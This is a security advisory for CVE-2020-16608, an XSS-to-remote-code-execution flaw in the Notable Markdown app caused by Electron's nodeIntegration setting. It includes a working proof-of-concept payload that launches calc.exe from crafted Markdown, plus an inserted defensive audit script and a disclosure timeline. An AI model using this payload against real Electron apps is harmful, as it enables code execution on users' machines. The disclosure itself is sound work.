CVE-2020-16608

TL;DR

Notable 1.8.4 allows XSS via crafted Markdown text, with resultant remote code execution (because nodeIntegration in webPreferences is true).

About Notable

Notable is a Markdown-based note-taking app built on the Electron framework. Notable was originally released as open source, but newer versions are no longer open source.

Electron and Node Integration

Electron is a framework that enables you to create desktop applications with JavaScript, HTML, and CSS. These applications can then be packaged to run directly on macOS, Windows, or Linux, or distributed via the Mac App Store or the Microsoft Store.

// Minimal Electron main-process example with nodeIntegration enabled.
// This is the insecure setting discussed below: with nodeIntegration true,
// scripts running in the renderer can call require() and reach Node APIs.
const { app, BrowserWindow } = require('electron')

function createWindow() {
  const win = new BrowserWindow({
    width: 800,
    height: 600,
    webPreferences: {
      nodeIntegration: true
    }
  })
  win.loadFile('index.html')
}

app.whenReady().then(createWindow)

Exploitation

After installing Notable, we extracted and inspected the app.asar archive, which revealed that nodeIntegration is set to true. Because the renderer can therefore call require(), an inline event handler injected through a note's Markdown is enough to reach Electron's shell module; the following payload launches calc.exe when the rendered link is hovered:

<a onmouseover="try{ const {shell} = require('electron'); shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">Harmless Link</a>
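As an added example (not the post's or Notable's own code), serving both the nodeIntegration section above and the payload just shown: a stand-alone audit of the BrowserWindow webPreferences that turn a Markdown XSS into code execution, alongside the hardened configuration that would have contained this payload. The preloadPath parameter and the Electron version defaults noted in the comments are assumptions; the block does not load the electron module.

```javascript
// Added example: audit an Electron webPreferences object for the renderer
// isolation settings involved in this CVE and build a hardened replacement.
// Runs stand-alone without the electron module.

// Settings whose insecure value exposes Node APIs or weakens isolation.
// Assumed Electron defaults: nodeIntegration false (>= 5), contextIsolation
// true (>= 12), sandbox true (>= 20), webSecurity true, enableRemoteModule false.
const CHECKS = [
  ['nodeIntegration', false, 'renderer can call require(), so any XSS becomes RCE'],
  ['nodeIntegrationInWorker', false, 'web workers get Node APIs'],
  ['contextIsolation', true, 'page scripts share a JS context with the preload script'],
  ['sandbox', true, 'renderer process is not sandboxed'],
  ['webSecurity', true, 'same-origin policy is disabled'],
  ['enableRemoteModule', false, 'remote module exposes main-process objects'],
];

// Returns one finding string per insecure setting; an empty array means the
// explicitly set values are safe. Unset keys are skipped because their default
// depends on the Electron version and must be checked against that release.
function auditWebPreferences(prefs) {
  const findings = [];
  for (const [key, safeValue, why] of CHECKS) {
    const value = prefs[key];
    if (value === undefined) continue;
    if (value !== safeValue) findings.push(`${key}=${value}: ${why}`);
  }
  return findings;
}

// Hardened counterpart of the configuration found in Notable. Anything the
// page legitimately needs from Node is exposed selectively through
// contextBridge in the preload script (preloadPath is a hypothetical path).
function hardenedWebPreferences(preloadPath) {
  return {
    nodeIntegration: false,
    nodeIntegrationInWorker: false,
    contextIsolation: true,
    sandbox: true,
    webSecurity: true,
    enableRemoteModule: false,
    preload: preloadPath,
  };
}

// The setting recovered from Notable 1.8.4's app.asar, as described above.
const notableWebPreferences = { nodeIntegration: true };
```

Running auditWebPreferences(notableWebPreferences) yields the single finding for nodeIntegration, while the hardened object produces none.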

Disclosure Timeline

  • 2020-04-24 Disclosure to developer
  • 2020-04-24 Developer stated that this would be fixed in upcoming builds.
  • 2020-12-04 Developer confirmed that as of v1.9.0-beta it is still unfixed but will be fixed in future builds.
  • 2020-12-10 Public disclosure of the vulnerability.


Sourov Ghosh